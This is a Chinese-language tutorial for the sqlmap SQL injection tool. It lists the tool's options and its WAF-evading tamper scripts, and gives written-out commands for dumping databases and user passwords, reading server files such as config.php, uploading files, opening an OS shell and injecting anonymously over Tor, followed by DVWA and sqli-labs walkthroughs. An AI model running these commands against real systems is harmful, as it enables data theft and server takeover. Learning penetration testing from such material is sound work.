sqlmap使用教程
目录1、介绍
SQLMAP是一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎,为最终渗透测试人员提供很多强大的功能,可以拖库,可以访问底层的文件系统,还可以通过带外连接执行操作系统上的命令。
2、常用参数
--version #显示程序的版本号并退出
-h, --help #显示此帮助消息并退出
-u #设置目标URL
-p #指定测试参数
-D #指定要进行枚举的数据库名
-U #指定要进行枚举的数据库表
-T #枚举列的信息
-C #指定要进行枚举的数据库列
-U #指定要进行枚举的数据车用户
--current-user #获取当前用户名称
--current-db #获取当前数据库名称
--cookie #设置cookie值
--dbs #列出数据库
--tables #列出数据库中的表
--columns #列出表中的列
--dump #列出表中的字段
--sql-shell #执行SQL命令
--os-cmd #执行系统命令
--os-shell #与系统交互shell
-r #加载外部请求包
--batch #使用默认参数进行
--data=DATA #通过POST发送数据字符串
--level=LEVEL #执行测试的等级(1-5,默认为1)
--risk=RISK #执行测试的风险(O-3,默认为1)
-v VERBOSE #详细级别:0-6(默认为1)
--proxy=PROXY #使用HTTP代理连接到目标URL
--user-agent #指定HTTP User-Agent
--tamper=TAMPER #使用给定的脚本(S)篡改注入数据
--random-agent #随机的请求头!
3、tamper脚本
# 使用方法--tamper xxx.py
apostrophemask.py # 用UTF-8全角字符替换单引号字符
apostrophenullencode.py # 用非法双字节unicode字符替换单引号字符
appendnullbyte.py # 在payload末尾添加空字符编码
base64encode.py # 对给定的payload全部字符使用Base64编码
between.py # 分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=”
bluecoat.py # 在SQL语句之后用有效的随机空白符替换空格符,随后用“LIKE”替换等于号“=”
chardoubleencode.py # 对给定的payload全部字符使用双重URL编码(不处理已经编码的字符)
charencode.py # 对给定的payload全部字符使用URL编码(不处理已经编码的字符)
charunicodeencode.py # 对给定的payload的非编码字符使用Unicode URL编码(不处理已经编码的字符)
concat2concatws.py # 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例
equaltolike.py # 用“LIKE”运算符替换全部等于号“=”
greatest.py # 用“GREATEST”函数替换大于号“>”
halfversionedmorekeywords.py # 在每个关键字之前添加MySQL注释
ifnull2ifisnull.py # 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例
lowercase.py # 用小写值替换每个关键字字符
modsecurityversioned.py # 用注释包围完整的查询
modsecurityzeroversioned.py # 用当中带有数字零的注释包围完整的查询
multiplespaces.py # 在SQL关键字周围添加多个空格
nonrecursivereplacement.py # 用representations替换预定义SQL关键字,适用于过滤器
overlongutf8.py # 转换给定的payload当中的所有字符
percentage.py # 在每个字符之前添加一个百分号
randomcase.py # 随机转换每个关键字字符的大小写
randomcomments.py # 向SQL关键字中插入随机注释
securesphere.py # 添加经过特殊构造的字符串
sp_password.py # 向payload末尾添加“sp_password” for automatic obfuscation from DBMS logs
space2comment.py # 用“/**/”替换空格符
space2dash.py # 用破折号注释符“--”其次是一个随机字符串和一个换行符替换空格符
space2hash.py # 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
space2morehash.py # 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
space2mssqlblank.py # 用一组有效的备选字符集当中的随机空白符替换空格符
space2mssqlhash.py # 用磅注释符“#”其次是一个换行符替换空格符
space2mysqlblank.py # 用一组有效的备选字符集当中的随机空白符替换空格符
space2mysqldash.py # 用破折号注释符“--”其次是一个换行符替换空格符
space2plus.py # 用加号“+”替换空格符
space2randomblank.py # 用一组有效的备选字符集当中的随机空白符替换空格符
unionalltounion.py # 用“UNION SELECT”替换“UNION ALL SELECT”
unmagicquotes.py # 用一个多字节组合%bf%27和末尾通用注释一起替换空格符
varnish.py # 添加一个HTTP头“X-originating-IP”来绕过WAF
versionedkeywords.py # 用MySQL注释包围每个非函数关键字
versionedmorekeywords.py # 用MySQL注释包围每个关键字
xforwardedfor.py # 添加一个伪造的HTTP头“X-Forwarded-For”来绕过WAF
4、使用示例
基础使用
1、判断注入点和数据类型:
(1) sqlmap -u http://www.test.php?id=1 #GET方法注入
(2) sqlmap -r /etc/url.txt #POST方法注入(使用Burpsuite等代理工具拦截POST请求内容,将POST请求内容保存在一个文本文件中,此处为url.txt,并用sqlmap调用)
2、判断数据库名(dbs):sqlmap -u "http://www.test.php?id=1" --dbs
3、判断表名(tables):sqlmap -u "http://www.test.php?id=1" -D 数据库名 --tables
4、判断列名(columns):sqlmap -u "http://www.test.php?id=1"-D 数据库名 -T 表名 --column
5、获取字段: sqlmap -u "http://www.test.php?id=1" -D 数据库名 -T 表名 -C 列名 --dump
进阶使用
sqlmap -u "http://url/news?id=1" --current-user #获取当前用户名称
sqlmap -u "http://url/news?id=1" --current-db #获取当前数据库名称
sqlmap -u "http://url/news?id=1" --dbs #枚举所有数据库名
sqlmap -u "http://url/news?id=1" -D "db_name" --tables #列出指定数据库的表名
sqlmap -u "http://url/news?id=1" -D "db_name" -T "tablename" --columns #列列出指定数据库对应表的字段
sqlmap -u "http://url/news?id=1" -D "db_name" -T "table_name" -C "column_name" --dump #获取字段内容
sqlmap -u "http://url/news?id=1" --dbms "Mysql" --users #dbms指定数据库类型
sqlmap -u "http://url/news?id=1" --users #列数据车用户
sqlmap -u "http://url/news?id=1" --passwords #数据库用户密码
sqlmap -u "http://url/news?id=1" --sql-shell/--os-cmd #执行指定sql命令
sqlmap -u "http://url/news?id=1" --os-cmd=whoami #执行系统命令
sqlmap -u "http://url/news?id=1" --os-shell #系统交互shell
sqlmap -u "http://url/news?id=1" --dbs -o"sqImap.log" #保存进度
sqlmap -u "http://url/news?id=1" --dbs -o"sqlmap.log" --resume #恢复已保存进度
sqlmap -u "http://url/news?id=1" --tamper "base64encode.py" #加载脚本(可利用绕过注入限制)
sqlmap -u "http://url/news?id=1" -p id #指定注入参数
sqlmap -u "http://url/news?id=1" --dump-all #爆出该数据库中的所有数据
sqlmap -u "http://url/news?id=1" --proxy="http://127.0.0.1:8080" #指定代理
sqlmap -u "http://url/news?id=1" --delay=3 --force-ssl # 当爆破HTTPS网站会出现超时的话,可以使用参数
sqlmap -u "http://url/news?id=1" --is-dba #判断当前用户是否有管理员权限
sqlmap -u "http://url/news?id=1" --identify-waf # 检测是否有WAF
sqlmap -u "http://url/news?id=1" --file-read "c:/test.txt" #读取目标服务器C盘下的test.txt文件
sqlmap -u "http://url/news?id=1" --file-write test.txt --file-dest "e:/hack.txt" #将本地的test.txt文件上传到目标服务器的E盘下,并且名字为hack.txt
===================================================================================
# 过waf手法
sqlmap -u "http://url/news?id=1"
--random-agent # 使用任意的User-Agent爆破
-v3 # 输出详细度,最大值5会显示请求包和回复包
--threads 5 # 指定线程数
--fresh-queries # 清除缓存
--flush-session # 清空会话,重构注入
--batch # 对所有的交互式的都是默认的
--random-agent # 任意的http头
--tamper "base64encode.py " # 对提交的数据进行base64编码
--referer http://www.baidu.com # 伪造referer字段
--random-agent # 使用任意HTTP头进行绕过,尤其是在WAF配置不当的时候
--time-sec=3 # 使用长的延时来避免触发WAF的机制,这方式比较耗时
--hpp # 使用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上
--proxy=http://127.0.0.1:7890 # 使用代理进行绕过
--ignore-proxy # 禁止使用系统的代理,直接连接进行注入
--flush-session # 清空会话,重构注入
--hex 或者 --no-cast # 进行字符码转换
--mobile # 对移动端的服务器进行注入
--tor # 匿名注入
直接使用
python sqlmap.py -u "https://www.vuln.cn/post.php?id=1" --force-ssl --proxy "http://127.0.0.1:7890" --batch --dbs
python sqlmap.py -u "http://www.vuln.cn" –cookie "id=11" --level 2
python sqlmap.py -u "www.xxxx.com/product/detail/id/3*.html" --dbms=mysql -v 3
python sqlmap.py -r "c:\request.txt" -p id –dbms mysql –file-read="e:\www\as\config.php"
5、案例演示
【sqlmap跑post的数据(含cookie)】
案例一:使用Sqlmap获取DVWA数据
dvwa-sql-Low
1、使用BP自带浏览器进行抓包(主要是抓取想要登入的cookie信息)
2、将数据包保存成文件,放入sqlmap目录下
3、加上-r参数带上数据包(如果数据包当中没有cookie信息的话,跑sqlmap时会重定向到登入页面--报浏览器302状态码)
结果就出来了
案例二:利用unmagicquotes脚本绕过magicquotes
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-33/?id=1" --batch --tamper=unmagicquotes
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-33/?id=1" --batch --tamper=unmagicquotes --current-db
